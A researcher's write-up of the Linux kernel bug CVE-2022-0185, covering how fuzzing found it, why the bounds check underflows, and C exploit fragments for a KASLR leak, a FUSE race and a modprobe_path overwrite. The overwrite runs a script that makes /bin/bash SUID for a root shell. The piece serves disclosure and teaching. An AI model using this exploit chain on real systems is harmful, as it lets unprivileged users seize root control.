CVE Explained

CVE-2022-0185: A Case Study

A tale on discovering a Linux kernel privesc

clubby789, Jan 16, 2022

CVE-2022-0185 was a 2-year-old bug in the Linux kernel. Introduced in Linux v5.1, an integer underflow bug in fs/fs_context.c allowed for a heap buffer overflow, which could allow any authenticated user to completely compromise the system.

Introduction

I've been playing CTFs with my team for a few years, and we've become increasingly interested in kernel exploits - both when solving and creating our own challenges. Some members of my team have even developed a novel exploitation technique that has since become common in real-life kernel exploits. We decided to apply our knowledge to discovering and exploiting a bug in the modern Linux kernel.

This article assumes a working knowledge of kernel fundamentals, but key concepts will be explained along the way.

Discovery

Finding vulnerabilities is often compared to finding a needle in a haystack, meaning it is much more time-consuming than mentally challenging. So, like most researchers, we opted to let the computer sift through the haystack by running a fuzzer, a tool that sends programs unexpected data and records all crashes. A kernel should never crash, and when it does, it’s a good potential lead for a place that might be exploitable.

As we were looking for a kernel bug, we opted to use Google's coverage-based kernel fuzzer, Syzkaller. This program allows distributed nodes to fuzz the Linux kernel with random syscalls, attempting to reach as much kernelspace code as possible. If a set of inputs causes the kernel to crash (or if an invalid memory access is detected), Syzkaller will begin diverting resources to 'reproducing' the crash - creating a program that can be reliably run to cause the crash.

After just a few days of fuzzing, we received a KASAN (Kernel Address Sanitizer) violation:

BUG: KASAN: slab-out-of-bounds in legacy_parse_param+0x450/0x640 fs/fs_context.c:569
Write of size 1 at addr ffff88802d7d9000 by task syz-executor.12/386100

CPU: 3 PID: 386100 Comm: syz-executor.12 Not tainted 5.14.0 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
Call Trace:
 legacy_parse_param+0x450/0x640 fs/fs_context.c:569
 vfs_parse_fs_param+0x1fd/0x390 fs/fs_context.c:146
 vfs_fsconfig_locked+0x177/0x340 fs/fsopen.c:265
 __do_sys_fsconfig fs/fsopen.c:439 [inline]
[ ... ]
The buggy address belongs to the object at ffff88802d7d8000
 which belongs to the cache kmalloc-4k of size 4096
The buggy address is located 0 bytes to the right of
 4096-byte region [ffff88802d7d8000, ffff88802d7d9000)

This indicates that the kernel has allocated a block of 4096 bytes, and the function legacy_parse_param tried to write outside of this specific area. Syzkaller quickly provided us with a C example, allowing us to better examine the logic:

#define _GNU_SOURCE 

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
uint64_t r[1] = {0xffffffffffffffff};
int main(void) {
	syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
	syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
	syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
	intptr_t res = 0;
	memcpy((void*)0x20000000, "9p\000", 3);
	res = syscall(__NR_fsopen, 0x20000000ul, 0ul);
	if (res != -1)
		r[0] = res;
	memcpy((void*)0x20001c00, "\000\000\344]\233", 5);
	memcpy((void*)0x20000540, "<long string>", 641);
	syscall(__NR_fsconfig, r[0], 1ul, 0x20001c00ul, 0x20000540ul, 0ul);
	int i;
	for(i = 0; i < 64; i++) {
		syscall(__NR_fsconfig, r[0], 1ul, 0x20001c00ul, 0x20000540ul, 0ul);
	}
	memset((void*)0x20000040, 0, 1);
	memcpy((void*)0x20000800, "<long string>", 641);
	syscall(__NR_fsconfig, r[0], 1ul, 0x20000040ul, 0x20000800ul, 0ul);
	for(i = 0; i < 64; i++) {
		syscall(__NR_fsconfig, r[0], 1ul, 0x20000040ul, 0x20000800ul, 0ul);
	}
	return 0;
}

As Syzkaller doesn't understand anything about the data it passes to the kernel, it’s showing the path it took to the crash, which includes unneeded and inefficient steps. It's up to us to interpret and reduce this PoC into something we can work with, cleaning out the parts that aren’t relevant. For example, a number of regions are mapped into the process using mmap, but only various parts of the 0x20000000ul range are used, so we can remove the other mmap calls. For how it is used, uint64_t r[1] = {0xffffffffffffffff}; is just a more complicated way of writing int r = -1;. We can replace each instance of an address with a variable or constant, so instead of using memcpy to copy the string “9p” into a buffer and then passing that buffer into the syscall, we can just use the string. After several simplifications, the above code reduces to:

int r = -1;
int main(void) {
	int res = 0;
	res = syscall(__NR_fsopen, "9p", 0ul);
	if (res != -1)
		r = res;
}

After a few passes, and cross-referencing our input against the relevant kernel function, we can produce a minimal reproducible example that exhibits the same behavior:

#define _GNU_SOURCE
#include <sys/syscall.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)
int main(void) { 
	char* key = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	int fd = 0;
	fd = fsopen("9p", 0);
	for (int i = 0; i < 130; i++) { 
		fsconfig(fd, FSCONFIG_SET_STRING, "\x00", key, 0);
	}
}

Code Audit

The function that both allocates and overflows our heap buffer is here:

static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param) {
	struct legacy_fs_context *ctx = fc->fs_private;	// [1]
	unsigned int size = ctx->data_size;			// [2]
	size_t len = 0;
	int ret;
	[ ... ]
	switch (param->type) {
	case fs_value_is_string:
		len = 1 + param->size;				// [3]
	case fs_value_is_flag:
		len += strlen(param->key);
		break;
	default:
		return invalf(fc, "VFS: Legacy: Parameter type for '%s' not supported", param->key);
	}
	if (len > PAGE_SIZE-2-size) return invalf(fc, "VFS: Legacy: Cumulative options too large"); // [4]
	[ ... ]
	if (!ctx->legacy_data) {
		ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);	// [5]
		if (!ctx->legacy_data) return -ENOMEM;
	}
	ctx->legacy_data[size++] = ',';      // [6]
	len = strlen(param->key);
	memcpy(ctx->legacy_data + size, param->key, len);
	size += len;
	if (param->type == fs_value_is_string) {
		ctx->legacy_data[size++] = '=';
		memcpy(ctx->legacy_data + size, param->string, param->size);
		size += param->size;
	}
	ctx->legacy_data[size] = '\0';
	ctx->data_size = size;
	ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
	return 0;
}

The system call fsopen creates a new filesystem context, which a user can use to mount a new filesystem. Certain filesystem types are marked as 'legacy', and trigger this code path. In this case, 9p (the Plan 9 filesystem) is one such filesystem and the one our fuzzer used to trigger the vulnerable code. ext4, another very common filesystem in the modern Linux world, also triggers it. fsconfig allows us to write a new key/value pair into ctx->legacy_data, which is a buffer 4096 bytes in size that is allocated the first time the filesystem is configured.

At [1] we load the legacy_fs_context (associated with the file descriptor), and at [2] we load size from it, which is the number of bytes written to the buffer so far. By the end of the switch that starts at [3], len becomes the length of the data we'll write - strlen(key) + 1 + strlen(value). This maps to the mount option string key=value.

At [4], bounds checking is performed, which should prevent heap overflows. As should be clear from the introduction, the bug is here, but we'll return to this later.

At [5], we allocate our PAGE_SIZE (4096) sized buffer for the first time. Finally, at [6], our data begins to be written to the heap. A comma is written, then our key, then an equals sign, and then our value. Finally, a terminating null byte is added, and the new size of the data is saved back.

Bug Analysis

The issue lies here: if (len > PAGE_SIZE-2-size) return invalf(fc, "VFS: Legacy: Cumulative options too large");. Remember that len is what's about to be written, PAGE_SIZE is the total buffer size, and size is the size of the data written already. A further 2 bytes are subtracted in the check, to account for the leading comma and the terminating null byte.

The issue here is the use of subtraction to perform this check. size is an unsigned value, which can lead to integer underflow. 'Unsigned' means that a value has no sign (+/-), and is therefore always treated as positive. If a subtraction results in a number going below 0, then it will instead wrap around to the highest possible value!

After 117 iterations of adding a key of length 0 and a value of length 33, the size is 4095 (117 * (33 + 2)). If we take the statement step by step:

PAGE_SIZE - 2 -> 4094
(PAGE_SIZE - 2) - size -> -1 == 18446744073709551615 when converted to an unsigned value
len > ((PAGE_SIZE - 2) - size) -> len > 18446744073709551615 -> false

The right-hand side of the check is the maximum possible value for len, so len will never exceed it. Therefore, once we reach 4095 bytes of length, our input will be completely unrestricted. After the leading comma of our next value is written, our next string (of unlimited length) will be written into the following 4096 byte page/heap allocation!

Beginning Exploitation

We now have an entirely controlled write in the heap. The Linux kernel groups dynamic allocations of memory in caches of similar sizes known as 'slabs' - the slab in which our write occurs is known as kmalloc-4k. Every allocation in a slab exists in a contiguous memory block. We can therefore be sure that overflowing our kmalloc-4k allocation will corrupt a neighboring kmalloc-4k structure.

This particular area of the heap is interesting, as it is used relatively little by the kernel. This means that we're less likely to corrupt data structures that we don't want to, which can result in exploit instability or even a system crash. However, there's a downside to this - it means that the number of structs allocated in this slab is low, and the number of useful target structs (heap gadgets) is even lower.

Luckily, my teammate FizzBuzz101 had recently explored and documented the use of the System V IPC message queue feature (known to us as msg_msg) in a very detailed writeup. This is an object that:

Is usable by low-privilege users
Can be used to trigger allocations in any heap slab up to 4k
Can be abused for both out-of-bounds read and write

Gaining a KASLR/kernel slide leak

In all real-life scenarios, KASLR will be enabled. This kernel feature offsets every function and variable in the kernel by a single random value that changes on every boot. We need to leak the address of a kernel global variable or function that we can use to find the kernel's base address, much like leaking the libc base in normal user program exploitation.

msg_msg has a useful property in that messages above a certain size will be split: the first allocation holds 0x30 bytes of msg_msg metadata followed by up to 0xfd0 bytes of data. The remainder will be allocated in an appropriately sized chunk, and a next pointer added to the first message. When we later receive our IPC message, the next pointers will be followed until the number of bytes given by the m_ts (size) field has been copied out.

To gain our kernel address leak, we'll attempt to 'spray' allocations of seq_operations - causing the kernel to create a large number of these objects on the heap, which live in the kmalloc-32 slab. This is a useful struct to target as it can be allocated by opening /proc/self/stat, and it contains 4 function pointers.

To reach this structure, our strategy will be:

Prepare the fs_context buffer for overflowing
Spray seq_operations structures into the kmalloc-32 slab
Spray a number of large messages into several message queues (size 0xfe8, which will allocate its second segment in kmalloc-32)
Use our overflow in kmalloc-4k to corrupt the m_ts/size field of the initial message
Request all of our messages back from our prepared queues, requesting the increased size values
Scan through the received buffer until we locate a valid kernel pointer
If subtracting that pointer's known offset within the kernel image leads to a valid, aligned kernel base address, we've got our leak

void *do_kaslr_leak () {
	uint64_t kbase = 0;
	char pat[0x30] = {0};
	char buffer[0x2000] = {0}, received[0x2000] = {0};
	msg *message = (msg *)buffer;
	int size = 0x1018;
	int targets[K_SPRAY] = {0};
	int i;
	// Spray queues/messages
	for (i = 0; i < K_SPRAY; i++) {
		memset(buffer, 0x41+i, sizeof(buffer));
		targets[i] = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);
		send_msg(targets[i], message, size - 0x30, 0);
	}
	// Spray function pointers
	for (int i = 0; i < 100; i++) {
		open("/proc/self/stat", O_RDONLY);
	}
	get_msg(targets[0], received, size - 0x30, 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
	memset(pat, 0x42, sizeof(pat));
	pat[sizeof(pat)-1] = '\x00';
	fd = fsopen("ext4", 0);
	if (fd < 0) {
		exit(-1);
	}
	strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
	for (int i = 0; i < 117; i++) {
		fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
	}
	// Corrupt the size field to 0x1060
	char tiny[] = "DDDDDDD";
	char tiny_evil[] = "DDDDDD\x60\x10";
	fsconfig(fd, FSCONFIG_SET_STRING, "CCCCCCCC", tiny, 0);
	fsconfig(fd, FSCONFIG_SET_STRING, "\x00", tiny_evil, 0);
	size = 0x1060;
	for (int i = 0; i < K_SPRAY; i++) {
		get_msg(targets[i], received, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
		// Check for valid kernel pointer and aligned base
		kbase = do_check_leak(received);
		if (kbase) {
			return (void*)kbase;
		}
	}
	puts("[X] No leaks, trying again");
	close(fd);
	return 0;
}

A number of tricks were used here, both to increase the reliability of our buffers overlapping and to prevent unintended collision causing instability and crashing. These have been omitted here, as they are kernel and hardware dependent, requiring manual tweaking.

Arbitrary write

The second half of most kernel exploits is arbitrary write, or 'write-what-where'. This primitive allows us to write a controlled value to any location we want. For this, we'll once again use msg_msg.

This technique is very thoroughly explained in the original writeup, but I'll attempt to summarize it here.
Similarly to our address leak, we'll abuse msg_msg's 'splitting' behavior for large messages. This time, we'll abuse a race condition.

The first message chunk is allocated
Our data is copied into it
The second message chunk is allocated
The next pointer of the first chunk is populated
The remainder of our data is copied into the chunk that the next pointer refers to.

There's a thin race window between points 4 and 5. If we can overwrite the next field before our data is copied to it, we'll have our data written to a fully controlled location. However, this is a very tight window. There's no obvious place that the kernel would yield control to us, so it would appear that we'll have to get very lucky with threads and timing. Fortunately, there are a couple of techniques that can be applied to increase our chances of success.

We need the kernel to run our code just before it copies our data. userfaultfd is a very common mechanism for this. When the kernel attempts to access an address that isn't mapped but is registered with userfaultfd, it will call our code to handle the fault. During this, we can perform whatever action is necessary to race, then yield control back to the kernel. Unfortunately, recent versions of Linux and several distributions have chosen to restrict this feature to the root user only, due to the obvious security implications.

FUSE

Luckily, a new technique has come into use - FUSE. Linux allows users to write their own filesystem drivers that run as unprivileged user code (Filesystem in USErspace). We simply have to implement a minimal FUSE filesystem, open a file in it, map it into memory using mmap, and pass the returned address to the kernel. As soon as the kernel attempts to read from the FUSE-backed address, it will need to call the read function that we define. In order to only trigger after the kernel has read our first chunk of data (the 0xfd0 bytes that fit alongside the msg_msg header), we'll allocate two memory blocks - the first is regular memory, the second is FUSE-backed.

void *evil_page = mmap((void *)0x1337000, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
uint64_t race_page = 0x1338000;
puts("[*] Preparing fault handlers via FUSE");
int evil_fd = open("evil/evil", O_RDWR);
if (evil_fd < 0) {
  perror("evil fd failed");
  exit(-1);
}
// Map the FUSE-backed file directly after the anonymous page
if (mmap((void *)race_page, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, evil_fd, 0) != (void *)race_page) {
  perror("mmap fail fuse 1");
  exit(-1);
}

The full malicious filesystem implementation has a lot of boilerplate, so I'll summarize it here.

We begin by opening a pipe pair - this is a buffer shared by two processes that can be used to send data between them. In our case, we'll just be using it for simple synchronization
We fork our exploit and have the child process run as a FUSE daemon, processing filesystem requests
We do the first half of our exploit, preparing leaks
We open/mmap our evil file
We prepare our exploit to overflow the heap, using fsopen and fsconfig up to 4096 bytes
We create a thread that performs the overflow and overwrites the next pointer
Meanwhile, the main thread calls msgsnd, which will stall in the kernel while our FUSE code handles the read
Our FUSE code calls read on the shared pipe, which will cause it to block until a byte is written to it
By this point, our overflowing thread has performed the exploit, and writes to the pipe. This causes FUSE to release and the thread to finish, which copies our malicious data into our controlled pointer

Write Target

We now have an arbitrary write to any address in the kernel. Where should we target? In proof-of-concept exploits such as this, a common target is modprobe_path. When the kernel needs to load a new module, it will actually call out to a normal user binary, running it as root. This path can be found at /proc/sys/kernel/modprobe (normally /sbin/modprobe), and corresponds to the kernel variable modprobe_path. This makes it a very attractive target. By overwriting this value with the path of a program we control, and causing the kernel to attempt to load a module, the program will be run as root. For our simple exploit, we'll prepare a program to be run:

char *modprobe_win = "/tmp/w";
#define  SHELL  "/bin/bash"
[ ... ]
void modprobe_init() {
  int fd;
  [ ... ]
  char w[] = "#!/bin/sh\nchmod u+s " SHELL "\n";
  chmod(modprobe_trigger, 0777);
  fd = open(modprobe_win, O_RDWR | O_CREAT, 0777);  // O_CREAT requires a mode argument
  if (fd < 0) {
    perror("winner creation failed");
    exit(-1);
  }
  write(fd, w, sizeof(w) - 1);  // leave the trailing NUL out of the script
  close(fd);
  chmod(modprobe_win, 0777);
  return;
}

This will set the SUID bit on /bin/bash, which will then give a root shell when we trigger it!

Triggering

But how to trigger our overwritten modprobe_path? Luckily, this technique has become well documented, with the rise in popularity of CTF kernel challenges. It turns out that when attempting to execute a file with unknown magic bytes, the kernel will actually use modprobe to attempt to find a module that is able to load the binary.

do_execve: return do_execveat_common(fd, filename, argv, envp, flags);
do_execveat_common: retval = bprm_execve(bprm, fd, filename, flags);
bprm_execve: retval = exec_binprm(bprm);
exec_binprm: ret = search_binary_handler(bprm);
search_binary_handler: if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
request_module: ret = call_modprobe(module_name, wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC);
call_modprobe:
static int call_modprobe(char *module_name, int wait) {
	struct subprocess_info *info;
	static char *envp[] = {
		"HOME=/",
		"TERM=linux",
		"PATH=/sbin:/usr/sbin:/bin:/usr/bin",
		NULL
	};
	char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
	module_name = kstrdup(module_name, GFP_KERNEL);
	argv[0] = modprobe_path; // <--- overwritten!
	argv[1] = "-q";
	argv[2] = "--";
	argv[3] = module_name;
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL, NULL, free_modprobe_argv, NULL);
	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
}

So all we need to do is prepare a binary with unknown magic bytes, and call it!

char *modprobe_trigger = "/tmp/root";
void modprobe_init() {
  int fd = open(modprobe_trigger, O_RDWR | O_CREAT, 0777);  // O_CREAT requires a mode argument
  char root[] = "\xff\xff\xff\xff";
  write(fd, root, sizeof(root));
  close(fd);
  chmod(modprobe_trigger, 0777);
  [ ... ]
}
void modprobe_hax() {
  puts("[*] Attempting to trigger modprobe");
  execve(modprobe_trigger, NULL, NULL);
}

To finish up, we repeatedly attempt to trigger the overwrite and trigger modprobe_path. We can verify if it has succeeded by checking the permissions on /bin/bash:

while (1) {
  do_win();
  modprobe_hax();
  struct stat check;
  // Get permissions on file
  stat(SHELL, &check);
  if (check.st_mode & S_ISUID) {
    break;
  }
}
puts("[*] Exploit success! " SHELL " is SUID now!");
puts("[+] Popping shell");
execve(SHELL, root_argv, NULL);

Wrapping Up

The full code for the exploit is available here, in exploit_fuse.c. There's also a second exploit_kctf.c exploit - a more complex exploit that we designed to escape Google's hardened Vulnerability Research Program Kubernetes cluster. For a more technical writeup of the second approach, my teammate documented our approach on his blog.

I recommend reading both approaches, and the released code, to understand the multiple ways a single bug can be leveraged to bypass different sets of mitigations and achieve different goals.